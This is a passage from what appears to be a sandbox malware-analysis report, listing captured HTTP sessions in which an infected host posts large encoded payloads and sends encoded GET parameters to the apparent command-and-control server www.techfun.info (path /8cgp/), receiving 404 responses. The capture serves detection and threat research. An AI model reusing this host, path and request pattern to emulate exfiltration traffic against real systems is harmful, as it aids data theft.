2f 45 6a 4e 4d 67 4c 46 70 6c 52 62 54 70 4f 2b 48 68 4d 55 47 6e 58 56 4f 2f 7a 38 34 6c 6d 75 78 61 45 4f 53 43 42 48 61 6b 53 62 2b 6d 44 79 73 4c 2b 68 44 55 43 74 66 4e 7a 57 77 55 4b 6a 62 50 44 4e 7a 44 78 6d 76 59 38 59 7a 49 4e 77 2b 78 61 2f 43 42 54 46 73 4a 73 72 37 4b 59 64 33 2f 73 62 6d 6f 68 7a 38 6c 55 76 37 6c 37 73 35 2b 50 37 44 59 72 37 4c 4e 39 6e 38 32 79 59 71 4d 59 4e 79 44 34 6f 6d 66 75 47 6f 66 61 4a 44 62 6d 59 36 6b 33 51 34 5a 38 6f 47 65 44 33 43 53 6e 30 2b 75 68 78 44 57 57 71 79 46 4d 34 74 56 50 5a 4b 45 79 57 32 57 30 69 52 39 61 6e 42 74 39 58 77 4b 48 59 6e 43 6d 4b 5a 4d 68 4c 4f 67 38 49 2b 48 5a 52 33 49 49 49 75 6d 63 5a 6e 50 6e 66 30 75 62 4f 37 44 6d 39 58 6f 78 73 55 50 67 72 74 4c 5a 6e 32 4a 61 45 62 73 39 77 4e 7a 36 47 57 4d 34 56 65 79 50 42 2b 44 46 6d 70 4f 53 62 31 6d 63 62 66 44 33 5a 71 6b 3d
                                                                    Data Ascii: Xh9lX=w+f7fcPcqc3KcmQijlCccDCwr3sNkkLldkcwCyRYqkdn30RthnBvGY5e9mX5boT2o6Ahj7EWvHpKa2uVkjReHZ6NxdASYTloBwBbOE0Ve6rssMVDZFWfkJzos6SnslpEZIyYa8MhoRbbKtx4ReT3KLf8qW+6Sd18OwB6jUFCJ8vs6l5KroO5Pva8/cIMKfvQcGLBfs468Z9suF8Od5QswQLauPQbNsa1ubVLcVh8MMYcY4QvxW9Ocda6s/EjNMgLFplRbTpO+HhMUGnXVO/z84lmuxaEOSCBHakSb+mDysL+hDUCtfNzWwUKjbPDNzDxmvY8YzINw+xa/CBTFsJsr7KYd3/sbmohz8lUv7l7s5+P7DYr7LN9n82yYqMYNyD4omfuGofaJDbmY6k3Q4Z8oGeD3CSn0+uhxDWWqyFM4tVPZKEyW2W0iR9anBt9XwKHYnCmKZMhLOg8I+HZR3IIIumcZnPnf0ubO7Dm9XoxsUPgrtLZn2JaEbs9wNz6GWM4VeyPB+DFmpOSb1mcbfD3Zqk=
                                                                    Apr 24, 2024 12:33:18.543939114 CEST533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:18 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    68192.168.11.2050313203.161.49.19380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:33:21.060810089 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 77 2b 66 37 66 63 50 63 71 63 33 4b 63 6d 51 69 6a 6c 43 63 63 44 43 77 72 33 73 4e 6b 6b 4c 6c 64 6b 63 77 43 79 52 59 71 6b 56 6e 30 43 46 74 67 45 70 76 48 59 35 65 31 47 58 34 62 6f 53 73 6f 36 6f 39 6a 37 41 73 76 43 74 4b 55 46 6d 56 6b 52 35 65 51 5a 36 4f 6f 74 41 51 4f 54 6b 30 42 77 4e 31 4f 41 6b 76 65 71 76 73 74 4f 39 44 64 79 4b 51 6e 5a 7a 75 73 36 54 6d 39 31 6f 37 5a 49 33 54 61 39 77 68 6f 58 62 62 59 75 4a 34 54 50 54 33 48 37 66 37 68 32 2b 4c 59 39 31 5a 4f 77 56 45 6a 55 45 39 4a 35 4c 73 36 6d 42 4b 71 76 62 76 50 50 61 38 33 38 49 50 4f 66 69 5a 63 47 57 53 66 74 38 36 38 62 4e 73 75 6c 38 4f 4c 49 51 72 7a 77 4c 55 71 50 51 4d 61 38 57 48 75 66 45 79 63 55 46 38 4d 38 6b 63 4b 62 49 76 69 43 52 4f 53 64 62 63 6f 2f 45 72 57 38 67 58 46 70 30 74 62 54 4a 30 2b 45 74 4d 58 6a 7a 58 44 37 66 30 71 49 6c 6b 68 52 61 72 63 69 4f 7a 48 61 55 47 62 2b 6d 54 79 74 50 2b 68 7a 45 43 73 64 31 77 63 77 55 4a 32 4c 50 73 45 54 50 2f 6d 75 30 30 59 79 67 64 77 39 64 61 35 69 42 54 56 37 31 76 68 4c 4b 62 52 58 2f 45 66 6d 70 33 7a 38 70 2b 76 2f 31 4e 73 4a 69 50 37 33 30 72 2f 62 4e 36 68 63 32 4d 44 36 4d 65 61 69 44 34 6f 6d 69 4b 47 6f 54 61 4a 52 4c 6d 65 49 4d 33 46 35 5a 38 37 57 65 4a 33 43 54 68 30 2b 69 61 78 44 65 34 71 7a 31 32 34 76 35 50 5a 59 38 79 52 33 57 7a 6e 68 38 65 6a 42 74 6d 49 41 48 52 59 6e 75 75 4b 5a 64 63 49 35 59 38 4a 2b 33 5a 56 33 49 50 43 75 6d 58 65 6e 4f 6b 62 30 54 4b 4f 37 66 51 39 54 6f 59 73 55 33 67 6f 36 6d 2b 30 33 68 48 63 39 73 58 2f 2f 7a 73 50 41 45 34 57 75 6d 33 41 4d 2f 63 6b 2b 47 58 62 58 62 64 41 64 72 67 45 4e 61 7a 69 42 4b 34 56 52 4b 66 48 6b 72 64 53 72 6b 41 2f 6f 34 4b 66 36 57 56 51 65 70 6a 56 58 34 6a 55 76 38 44 76 32 38 33 45 4e 67 66 55 61 46 2f 4b 45 4e 42 4d 33 62 44 49 53 57 76 41 47 4e 2f 76 53 72 76 43 71 63 43 37 43 32 41 70 6d 35 7a 4a 38 79 5a 51 31 39 69 48 67 6f 30 4f 6c 72 2f 50 6f 68 2f 51 34 56 6f 79 54 4b 50 58 75 4d 36 68 38 64 51 75 7a 33 36 74 4e 31 36 74 61 35 53 34 31 4b 49 47 4d 5a 63 48 50 70 57 68 4a 33 73 33 68 57 39 6d 50 4a 67 6b 35 35 6d 49 54 32 48 74 56 46 68 50 49 72 2b 38 76 69 70 49 43 53 50 52 58 55 58 34 71 55 53 6a 66 41 6e 5a 72 6a 73 75 32 52 38 33 2b 70 75 58 64 43 70 35 68 51 30 4c 4a 53 4c 6f 38 45 69 6b 34 58 69 4e 62 32 6d 47 4d 62 42 6d 54 2b 49 30 7a 37 63 4a 64 57 43 59 4c 65 6b 31 61 52 6b 6b 57 34 41 64 68 66 59 6b 30 73 6d 78 71 37 79 72 41 38 37 35 74 65 30 71 42 73 37 6b 33 57 37 4e 45 6b 42 6c 79 50 31 57 71 76 69 67 42 5a 59 66 6a 6a 59 56 55 30 30 4c 35 4e 6a 4b 6c 56 75 7a 58 7a 44 4c 73 38 4d 2b 49 2f 54 71 76 43 4f 68 69 34 41 53 64 6b 4d 67 46 2b 6c 70 69 66 46 31 6b 34 53 55 69 4d 4f 59 34 6b 31 6a 35 78 6a 47 6b 73 63 63 6a 77 76 57 65 51 4d 30 71 4f 33 41 36 44 33 75 46 4a 62 31 71 6e 62 32 31 61 62 6f 66 71 35 78 64 6a 33 2b 30 72 77 6d 69 53 48 35 5a 7a 30 54 74 74 4d 67 42 78 47 6d 6d 32 45 4c 32 4f 55 2f 62 49 35 62 34 4e 62 4f 52 51 30 33 32 39 42 42 48 55 37 39 4e 76 6c 53 4a 75 6c 76 52 65 6d 6c 5a 57 58 2f 4a 78 35 50 37 30 64 6e 77 4b 54 54 33 57 43 5a 64 69 62 54 5a 2f 67 4c 62 7a 73 41 38 59 63 55 2b 38 4c 4d 4f 37 37 4c 66 55 34 6c 55 4d 75 69 4d 67 49 4a 6c 57 46 7a 79 35 50 47 38 45 46 46 49 39 56 76 57 5a 57 35 41 72 43 4e 73 45 6c 6d 4b 7a 65 37 4f 6e 53 69 79 73 67 4f 76 68 35 71 45 43 48 6b 75 63 73 4f 64 30 34 50 49 71 75 79 44 4f 2b 41 58 68 4d 50 78 62 7a 33 32 54 7a 71 37 39 62 6c 54 2b 6b 49 45 4a 6a 47 72 76 73 58 34 76 64 32 66 6d 52 58 39 6f 43 54 64 2f 70 2f 6e 79 4c 77 36 63 54 33 54 62 73 75 74 6c 35 55 56 48 50 32 57 68 72 79 45 34 34 38 6e 69 57 6e 32 72 68 75 2f 74 6a 5a 51 6a 66 79 70 4d 44 61 42 69 4a 6b 57 38 63 39 4f 4d 30 51 73 58 59 2b 44 44 6d 45 75 57 39 53 73 47 64 57 6e 43 2f 6d 47 6b 7a 32 2f 68 50 49 74 31 41 42 34 69 46 44 6f 55 4f 49 73 30 63 66 41 54 57 74 32 55 42 37 69 45 76 44 62 4d 55 4e 2f 4c 68 62 4d 72 34 54 54 55 74 5a 50 35 4e 37 79 7a 75 44 39 35 30 33 31 30 68 36 4b 51 62 54 68 79 63 73 46 66 52 4d 4c 6d 48 6b 61 70 71 35 6a 70 6d 59 79 71 4f 4c 4e 4c 44 48 72 4c 78 48 52 6f 77 53 76 38 64 4e 55 48 36 78
                                                                    Data Ascii: Xh9lX=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
                                                                    Apr 24, 2024 12:33:21.060933113 CEST10312OUTData Raw: 43 48 54 42 59 4d 77 79 4c 78 42 39 35 33 37 6a 30 2b 50 72 43 5a 54 78 37 71 54 43 6b 79 37 6f 38 30 2f 4d 4f 4d 37 39 45 75 69 70 6e 4e 33 71 45 7a 33 6b 67 2f 42 76 55 78 76 52 79 36 67 50 48 31 43 4b 72 4f 61 52 76 78 58 6b 6b 33 45 69 50 71
                                                                    Data Ascii: CHTBYMwyLxB9537j0+PrCZTx7qTCky7o80/MOM79EuipnN3qEz3kg/BvUxvRy6gPH1CKrOaRvxXkk3EiPqqrVAD7dRbnHblt0TirqZ6HdXM+wbIyzA5VvyoWOXWGSUbM2kwN8qFHCzgiu9L+NNuPncqBNbDJawRsvF1nfHJFc1F5SOU52O1UcvMi1mGOnH4id1/8sRdSbWT1uED1xwV1touS21VlJqyFTduFkOmUBK6SG2VQCjF
                                                                    Apr 24, 2024 12:33:21.232425928 CEST1289OUTData Raw: 54 33 71 39 79 44 59 71 4c 7a 36 6a 4a 76 54 6f 69 74 48 5a 66 44 51 42 4c 6a 62 6d 4e 64 5a 4e 4c 33 2f 7a 4f 50 31 4b 71 53 7a 63 58 68 41 74 62 4a 79 58 32 6e 6a 36 4d 46 44 65 43 51 5a 42 71 4b 47 45 31 68 79 4a 42 58 31 42 61 52 59 64 68 6a
                                                                    Data Ascii: T3q9yDYqLz6jJvToitHZfDQBLjbmNdZNL3/zOP1KqSzcXhAtbJyX2nj6MFDeCQZBqKGE1hyJBX1BaRYdhjiAVJ87e2S0beX3RPFLn5iIAYt/rGHUwNOeg6nedSAEJe7xNBVc1xFm5lzSuRmsODYsYTeNchhrD8zIvXJEuqOZy+kp8SdahCDpih4BEXZUNoC3qLmIujnmmr1/eVC8ljvcCerhVH0KfvIXdAQAZCM3lhWLaYgVcXN
                                                                    Apr 24, 2024 12:33:21.232603073 CEST9023OUTData Raw: 39 46 69 58 41 32 6d 37 34 6e 37 54 49 58 59 43 44 43 57 54 63 43 52 48 63 6a 58 57 74 73 72 6e 44 6f 54 57 71 48 54 58 46 31 6c 53 2f 78 65 4f 76 38 4c 33 42 46 49 6b 31 5a 48 32 77 2f 43 5a 73 37 78 6a 32 44 6f 77 48 64 59 41 45 57 66 74 35 47
                                                                    Data Ascii: 9FiXA2m74n7TIXYCDCWTcCRHcjXWtsrnDoTWqHTXF1lS/xeOv8L3BFIk1ZH2w/CZs7xj2DowHdYAEWft5G6fmp2NX3wGYfof0HBH7RxahaThEU0cnlAlrkuRbKP/70+UYCm1OXDg07sjrAcGacWwq07Iu8eNYJCifxgCQlcr5KvuVTHfYiho8uyUJ0l6Km1aMPKzkLZQ35lyByXbg7O/SYyXeYaxNCBDPPdbuLdpl8+KrwZ1uwJ
                                                                    Apr 24, 2024 12:33:21.232796907 CEST2578OUTData Raw: 52 42 49 34 4c 69 79 55 38 41 50 6a 54 72 59 43 71 41 6c 46 56 4d 63 73 62 53 48 35 5a 74 56 79 61 72 35 30 71 4e 50 41 6f 65 78 55 48 58 54 5a 37 73 6f 4c 47 53 68 6b 2b 37 43 33 4f 4c 49 72 46 30 65 53 41 4e 56 6a 49 48 71 7a 77 7a 4c 4e 76 65
                                                                    Data Ascii: RBI4LiyU8APjTrYCqAlFVMcsbSH5ZtVyar50qNPAoexUHXTZ7soLGShk+7C3OLIrF0eSANVjIHqzwzLNvePDhLsAKznRI0OYRcU+zKnQiGQp4c0UmmBQRv95Ss/DKRNsUkX8uzsAiI7RSz4M0aQ2SLCHfvsVvvtSJlzGcapF+E4BECN+1xTLIQLaCj5Ya7PY6w5tnv33FpO7Kw7si9ilazyRwxV4oQrhTKqaIQoMIc/ItFOX56x
                                                                    Apr 24, 2024 12:33:21.233107090 CEST10312OUTData Raw: 46 49 42 32 33 6d 35 2b 63 43 43 42 56 72 50 59 32 63 37 4a 58 51 50 66 70 54 75 4b 4e 5a 43 50 6d 30 71 56 4b 4c 57 63 66 33 52 32 4a 36 4f 67 79 62 32 53 77 59 36 41 58 69 4f 41 33 59 2b 65 4e 77 52 74 44 42 39 62 50 38 66 71 59 64 4e 79 56 74
                                                                    Data Ascii: FIB23m5+cCCBVrPY2c7JXQPfpTuKNZCPm0qVKLWcf3R2J6Ogyb2SwY6AXiOA3Y+eNwRtDB9bP8fqYdNyVtBTT2ypZc2IISJb4yUfzVmDFUIXm+gKVGgTVh/9y6P4ChM4LLQUTL0j8EQsw+75qJsoRuAQ0iO7GzJhFOZxw+nqDYy4OoX175af226yrJ/gsDedlOPSe++ajVMDT7ev6JMymcExw0zlhsVdwBlScwuONTWfLHf1CKR
                                                                    Apr 24, 2024 12:33:21.233472109 CEST2578OUTData Raw: 5a 55 46 36 76 34 77 58 45 6f 53 79 32 45 38 6a 39 64 50 75 2f 46 7a 39 69 54 6a 56 31 30 43 73 54 4b 33 2f 73 49 4e 35 4a 64 46 4a 68 32 76 61 42 4f 78 76 6b 39 43 48 43 78 2b 78 73 43 52 75 7a 36 46 74 7a 74 53 34 39 67 38 4a 70 47 4c 6f 6f 7a
                                                                    Data Ascii: ZUF6v4wXEoSy2E8j9dPu/Fz9iTjV10CsTK3/sIN5JdFJh2vaBOxvk9CHCx+xsCRuz6FtztS49g8JpGLoozIF/wNAzREoCzBLHXIfKlRgyGxQNgtf9vrZWxd8Y0CRpBW/IJJWQDRvZHrkBMz/jya1jlZzagWf697mj9scKaCRtu/flDiBkvdUKDObp4uFe4CueBpawd77ZXFJ1Tyo7hLmXpeaaR1vuoG1VlOFoFHDv2yO/MbFTkO
                                                                    Apr 24, 2024 12:33:21.404459000 CEST2578OUTData Raw: 51 58 63 59 78 62 74 46 48 39 31 66 52 44 67 75 4a 71 68 39 52 56 71 4f 41 4a 48 76 36 66 47 59 38 4f 77 33 47 32 33 47 68 79 55 6d 52 30 6c 53 68 64 76 6f 61 4b 6b 54 46 4c 2f 71 6d 67 2f 45 63 77 45 73 55 36 70 57 71 78 2f 65 6a 36 44 6c 36 6f
                                                                    Data Ascii: QXcYxbtFH91fRDguJqh9RVqOAJHv6fGY8Ow3G23GhyUmR0lShdvoaKkTFL/qmg/EcwEsU6pWqx/ej6Dl6o841WvS+hNp26obX1TnGI/gZe3CsM/iQPiGSFLwNIVbEG+MMTBVQJ0BBQUSMMKSouleU8kOTXdgtc+OYHi8OwndtmzjGsKgXbo9BsDNVqZL9vzEA9fDSurKmNgq+nJyl0GkGpCCFrifcNs6hb5Bl1hnCRAcHEERWep
                                                                    Apr 24, 2024 12:33:21.404618025 CEST1289OUTData Raw: 56 34 6d 6a 64 62 43 47 50 6a 79 70 6e 45 63 76 45 4c 48 2b 32 75 58 53 6d 6c 44 52 6c 47 42 42 39 2f 38 70 46 2b 4e 77 61 37 4d 36 35 4f 35 77 68 75 59 41 30 41 6e 4f 6d 6c 58 6e 69 4e 38 53 45 41 58 4d 77 31 54 49 4d 73 52 44 31 61 30 58 4e 44
                                                                    Data Ascii: V4mjdbCGPjypnEcvELH+2uXSmlDRlGBB9/8pF+Nwa7M65O5whuYA0AnOmlXniN8SEAXMw1TIMsRD1a0XNDP+ZSMibH3R3SJYR7enZ/H7OHUGtrly+vSaEbe5E7HrgGuzFH9VgnqSfP9tC8GbxQImtVP9/qU7VviIYewYh9pD480dyVDCc5VQRKP4+o3PZhD/gx9GIu6AZ+2qMZSKiUSwfXMmlbqHHh7uNzFwIjjNuLMn0pL5VVB
                                                                    Apr 24, 2024 12:33:21.404840946 CEST10312OUTData Raw: 4c 74 6d 6d 56 52 34 4e 4c 49 4b 67 72 62 65 47 71 67 46 31 71 61 36 56 37 32 36 6c 4e 4c 71 6e 4e 37 70 6d 39 68 79 58 70 50 6d 46 55 2b 64 78 32 6e 6d 48 33 55 67 34 74 49 6d 62 4b 4f 31 58 6c 54 59 4a 50 6f 46 4f 69 6c 2b 37 46 64 31 52 77 33
                                                                    Data Ascii: LtmmVR4NLIKgrbeGqgF1qa6V726lNLqnN7pm9hyXpPmFU+dx2nmH3Ug4tImbKO1XlTYJPoFOil+7Fd1Rw3YeiFjvr7G1dlsEKXSLvriHuuGGVKcE5UT9osiGW5tMvq6fLjyiZZQ9sdMgRfaJDl0WQv1cWA1HqD/MroL9IVzfCnsybj0kvWo+qmgXqO5/hs2Mb68riTFqFYGtYQw3ZNxoUcBWjtjUOCFYT40vDQAMBBkKmNTCeuP
                                                                    Apr 24, 2024 12:33:21.404953957 CEST547OUTData Raw: 55 33 43 68 66 4a 43 78 47 38 41 34 71 73 69 41 2f 41 7a 61 77 79 5a 6f 2f 51 47 78 44 4e 2f 73 73 47 67 63 4d 75 67 69 4a 4f 63 78 74 53 45 73 6e 4c 41 4c 31 78 44 52 42 4d 79 72 41 63 61 56 68 61 72 58 55 65 43 71 50 4a 62 32 78 63 59 39 34 55
                                                                    Data Ascii: U3ChfJCxG8A4qsiA/AzawyZo/QGxDN/ssGgcMugiJOcxtSEsnLAL1xDRBMyrAcaVharXUeCqPJb2xcY94U6wzjWcu21A3ru/FGUWF6QU+gC3DqBjsGJM/vX8dy6cfmokQmEnmHiDwQcEvioLvNR+pYmO2UNEB80Qstt1bUAmpI1fybYZ40ITTGbO8ts/hP4x2KHBsvMmIm7be3d7fLM0/uT6ZqB+v/p/rIdFzVwf3j/fYuOXRSp
                                                                    Apr 24, 2024 12:33:21.624972105 CEST533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:21 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    69192.168.11.2050314203.161.49.19380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:33:23.753855944 CEST389OUTGET /8cgp/?Xh9lX=983bcoiGgeytF04qoACGbDKY/XdXjFbfWR4mUmAai3szv0RRsFt8B5NwzCzTf8Kup64VkssKhH1SAFuTkhM3B+3j/r4OeS1gek1PDXkJF4iS0+BJcCSan5A=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.techfun.info
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:33:23.936319113 CEST548INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:33:23 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 